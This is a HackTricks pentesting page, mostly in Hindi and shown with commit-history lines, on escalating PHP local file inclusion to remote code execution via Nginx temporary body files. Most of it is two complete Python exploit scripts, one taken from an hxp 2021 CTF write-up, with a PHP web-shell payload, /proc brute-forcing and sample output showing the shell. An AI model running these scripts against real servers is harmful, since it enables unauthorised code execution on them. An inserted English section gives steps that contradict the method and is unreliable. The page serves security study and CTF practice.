hacktricks/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md

322 lines
16 KiB
Markdown
Raw Normal View History

2023-11-06 08:38:02 +00:00
# LFI2RCE एनजिनक्स टेम्प फ़ाइल के माध्यम से
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह विशेष [**NFTs**](https://opensea.io/collection/the-peass-family)
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
2022-04-28 16:01:33 +00:00
</details>
2023-11-06 08:38:02 +00:00
## भेद्य समाकृति
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
* PHP कोड:
2022-04-20 19:39:32 +00:00
```
<?php include_once($_GET['file']);
```
2023-11-06 08:38:02 +00:00
* FPM / PHP कॉन्फ़िग:
2022-04-20 19:39:32 +00:00
```
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
```
2023-11-06 08:38:02 +00:00
* सेटअप / हार्डनिंग:
2022-04-20 19:39:32 +00:00
```
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
2023-11-06 08:38:02 +00:00
भाग्य से वर्तमान में PHP अक्सर PHP-FPM और Nginx के माध्यम से डिप्लॉय होता है। Nginx एक आसानी से छूट जाने वाली [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) सुविधा प्रदान करता है जो एक निश्चित सीमा से अधिक होने पर अस्थायी फ़ाइलें लिखेगी यदि क्लाइंट बॉडी (पोस्ट करने के लिए सीमित नहीं है)।
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
यदि Nginx व्यापक रूप से www-data के रूप में PHP के साथ चलता है (बहुत आम रूप से किया जाता है), तो यह सुविधा LFIs को फ़ाइलें बनाने के किसी अन्य तरीके के बिना भी उत्पन्न करने की अनुमति देती है।
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
संबंधित Nginx कोड:
2022-04-20 19:39:32 +00:00
```c
ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
{
2023-11-06 08:38:02 +00:00
ngx_fd_t fd;
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
fd = open((const char *) name, O_CREAT|O_EXCL|O_RDWR,
access ? access : 0600);
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
if (fd != -1 && !persistent) {
(void) unlink((const char *) name);
}
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
return fd;
2022-04-20 19:39:32 +00:00
}
```
2023-11-06 08:38:02 +00:00
यह दिखाई देता है कि **tempfile को Nginx द्वारा खोलने के तुरंत बाद अनलिंक किया जाता है**। भाग्य से **procfs का उपयोग करके हटाए गए फ़ाइल का संदर्भ प्राप्त किया जा सकता है** एक रेस के माध्यम से:
2022-04-20 19:39:32 +00:00
```
...
/proc/34/fd:
total 0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 0 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0
lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon_inode:[eventfd]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:[27587]
lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:[27589]
lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:[44926]
lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
2023-11-06 08:38:02 +00:00
नोट: इस उदाहरण में `/proc/34/fd/15` को सीधे शामिल नहीं किया जा सकता है क्योंकि PHP की `include` फ़ंक्शन पथ को `/var/lib/nginx/body/0000001368 (deleted)` में रेज़ॉल्व करेगी जो फ़ाइलसिस्टम में मौजूद नहीं है। यह छोटी सी प्रतिबंधता भाग्य से कुछ इंद्रधनुष के द्वारा दूर की जा सकती है जैसे: `/proc/self/fd/34/../../../34/fd/15` जो अंततः हटाए गए `/var/lib/nginx/body/0000001368` फ़ाइल की सामग्री को निष्पादित करेगा।
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
## पूर्ण शोषण
2022-04-20 19:39:32 +00:00
```python
#!/usr/bin/env python3
import sys, threading, requests
# exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance
# see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details
URL = f'http://{sys.argv[1]}:{sys.argv[2]}/'
2023-11-06 08:38:02 +00:00
# find nginx worker processes
2022-04-20 19:39:32 +00:00
r = requests.get(URL, params={
2023-11-06 08:38:02 +00:00
'file': '/proc/cpuinfo'
2022-04-20 19:39:32 +00:00
})
cpus = r.text.count('processor')
r = requests.get(URL, params={
2023-11-06 08:38:02 +00:00
'file': '/proc/sys/kernel/pid_max'
2022-04-20 19:39:32 +00:00
})
pid_max = int(r.text)
print(f'[*] cpus: {cpus}; pid_max: {pid_max}')
nginx_workers = []
for pid in range(pid_max):
2023-11-06 08:38:02 +00:00
r = requests.get(URL, params={
'file': f'/proc/{pid}/cmdline'
})
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
if b'nginx: worker process' in r.content:
print(f'[*] nginx worker found: {pid}')
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
nginx_workers.append(pid)
if len(nginx_workers) >= cpus:
break
2022-04-20 19:39:32 +00:00
done = False
# upload a big client body to force nginx to create a /var/lib/nginx/body/$X
def uploader():
2023-11-06 08:38:02 +00:00
print('[+] starting uploader')
while not done:
requests.get(URL, data='<?php system($_GET["c"]); /*' + 16*1024*'A')
2022-04-20 19:39:32 +00:00
for _ in range(16):
2023-11-06 08:38:02 +00:00
t = threading.Thread(target=uploader)
t.start()
2022-04-20 19:39:32 +00:00
# brute force nginx's fds to include body files via procfs
# use ../../ to bypass include's readlink / stat problems with resolving fds to `/var/lib/nginx/body/0000001150 (deleted)`
def bruter(pid):
2023-11-06 08:38:02 +00:00
global done
while not done:
print(f'[+] brute loop restarted: {pid}')
for fd in range(4, 32):
f = f'/proc/self/fd/{pid}/../../../{pid}/fd/{fd}'
r = requests.get(URL, params={
'file': f,
'c': f'id'
})
if r.text:
print(f'[!] {f}: {r.text}')
done = True
exit()
2022-04-20 19:39:32 +00:00
for pid in nginx_workers:
2023-11-06 08:38:02 +00:00
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
2022-04-20 19:39:32 +00:00
```
2023-11-06 08:38:02 +00:00
# LFI to RCE via Nginx Temp Files
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
## Introduction
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
In this technique, we will exploit a Local File Inclusion (LFI) vulnerability to achieve Remote Code Execution (RCE) by leveraging Nginx temporary files. This technique is effective when the target server is running Nginx web server and has a misconfigured or vulnerable LFI vulnerability.
## Prerequisites
To perform this attack, you need the following:
- A target server running Nginx web server.
- Knowledge of the target's file system structure.
- A vulnerable LFI vulnerability on the target server.
## Exploitation Steps
1. Identify the LFI vulnerability: Find a parameter or input field that is vulnerable to LFI on the target website.
2. Exploit the LFI vulnerability: Inject a payload that includes the path to the Nginx temporary files directory. This can be achieved by appending the following payload to the vulnerable parameter:
```
/var/lib/nginx/tmp/client_body/XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```
Replace the `X` characters with a unique filename.
3. Trigger the payload: Submit the request containing the payload to the target server.
4. Monitor the Nginx temporary files directory: Check the Nginx temporary files directory to see if the payload file has been created. The path to the directory can be found in the Nginx configuration file.
5. Execute the payload: If the payload file is successfully created, it means that the LFI vulnerability has allowed us to write files to the server. Now, we can execute arbitrary commands by injecting them into the payload file.
## Conclusion
By leveraging Nginx temporary files, we can exploit an LFI vulnerability to achieve RCE on a target server running Nginx web server. This technique can be used to gain unauthorized access and execute arbitrary commands on the target system. It is important to note that this technique should only be used for ethical purposes, such as penetration testing and security research.
2022-04-20 19:39:32 +00:00
```
$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
[*] nginx worker found: 33
[*] nginx worker found: 34
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] starting uploader
[+] brute loop restarted: 33
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
2023-11-06 08:38:02 +00:00
### एक और अभिशाप
2022-04-20 19:39:32 +00:00
2023-11-06 08:38:02 +00:00
यह [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/) से है।
2022-06-23 12:12:25 +00:00
```python
import requests
import threading
import multiprocessing
import threading
import random
SERVER = "http://localhost:8088"
NGINX_PIDS_CACHE = set([34, 35, 36, 37, 38, 39, 40, 41])
# Set the following to True to use the above set of PIDs instead of scanning:
USE_NGINX_PIDS_CACHE = False
def create_requests_session():
2023-11-06 08:38:02 +00:00
session = requests.Session()
# Create a large HTTP connection pool to make HTTP requests as fast as possible without TCP handshake overhead
adapter = requests.adapters.HTTPAdapter(pool_connections=1000, pool_maxsize=10000)
session.mount('http://', adapter)
return session
2022-06-23 12:12:25 +00:00
def get_nginx_pids(requests_session):
2023-11-06 08:38:02 +00:00
if USE_NGINX_PIDS_CACHE:
return NGINX_PIDS_CACHE
nginx_pids = set()
# Scan up to PID 200
for i in range(1, 200):
cmdline = requests_session.get(SERVER + f"/?action=read&file=/proc/{i}/cmdline").text
if cmdline.startswith("nginx: worker process"):
nginx_pids.add(i)
return nginx_pids
2022-06-23 12:12:25 +00:00
def send_payload(requests_session, body_size=1024000):
2023-11-06 08:38:02 +00:00
try:
# The file path (/bla) doesn't need to exist - we simply need to upload a large body to Nginx and fail fast
payload = '<?php system("/readflag"); ?> //'
requests_session.post(SERVER + "/?action=read&file=/bla", data=(payload + ("a" * (body_size - len(payload)))))
except:
pass
2022-06-23 12:12:25 +00:00
def send_payload_worker(requests_session):
2023-11-06 08:38:02 +00:00
while True:
send_payload(requests_session)
2022-06-23 12:12:25 +00:00
def send_payload_multiprocess(requests_session):
2023-11-06 08:38:02 +00:00
# Use all CPUs to send the payload as request body for Nginx
for _ in range(multiprocessing.cpu_count()):
p = multiprocessing.Process(target=send_payload_worker, args=(requests_session,))
p.start()
2022-06-23 12:12:25 +00:00
def generate_random_path_prefix(nginx_pids):
2023-11-06 08:38:02 +00:00
# This method creates a path from random amount of ProcFS path components. A generated path will look like /proc/<nginx pid 1>/cwd/proc/<nginx pid 2>/root/proc/<nginx pid 3>/root
path = ""
component_num = random.randint(0, 10)
for _ in range(component_num):
pid = random.choice(nginx_pids)
if random.randint(0, 1) == 0:
path += f"/proc/{pid}/cwd"
else:
path += f"/proc/{pid}/root"
return path
2022-06-23 12:12:25 +00:00
def read_file(requests_session, nginx_pid, fd, nginx_pids):
2023-11-06 08:38:02 +00:00
nginx_pid_list = list(nginx_pids)
while True:
path = generate_random_path_prefix(nginx_pid_list)
path += f"/proc/{nginx_pid}/fd/{fd}"
try:
d = requests_session.get(SERVER + f"/?action=include&file={path}").text
except:
continue
# Flags are formatted as hxp{<flag>}
if "hxp" in d:
print("Found flag! ")
print(d)
2022-06-23 12:12:25 +00:00
def read_file_worker(requests_session, nginx_pid, nginx_pids):
2023-11-06 08:38:02 +00:00
# Scan Nginx FDs between 10 - 45 in a loop. Since files and sockets keep closing - it's very common for the request body FD to open within this range
for fd in range(10, 45):
thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids))
thread.start()
2022-06-23 12:12:25 +00:00
def read_file_multiprocess(requests_session, nginx_pids):
2023-11-06 08:38:02 +00:00
for nginx_pid in nginx_pids:
p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids))
p.start()
2022-06-23 12:12:25 +00:00
if __name__ == "__main__":
2023-11-06 08:38:02 +00:00
print('[DEBUG] Creating requests session')
requests_session = create_requests_session()
print('[DEBUG] Getting Nginx pids')
nginx_pids = get_nginx_pids(requests_session)
print(f'[DEBUG] Nginx pids: {nginx_pids}')
print('[DEBUG] Starting payload sending')
send_payload_multiprocess(requests_session)
print('[DEBUG] Starting fd readers')
read_file_multiprocess(requests_session, nginx_pids)
2022-06-23 12:12:25 +00:00
```
2023-11-06 08:38:02 +00:00
## लैब्स
2022-04-20 19:39:32 +00:00
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/php-lfi-with-nginx-assistance.tar.xz)
* [https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/](https://2021.ctf.link/internal/challenge/ed0208cd-f91a-4260-912f-97733e8990fd/)
* [https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/](https://2021.ctf.link/internal/challenge/a67e2921-e09a-4bfa-8e7e-11c51ac5ee32/)
2023-11-06 08:38:02 +00:00
## संदर्भ
2022-04-20 19:39:32 +00:00
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने की अनुमति** चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PR जमा करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को**
2022-04-28 16:01:33 +00:00
</details>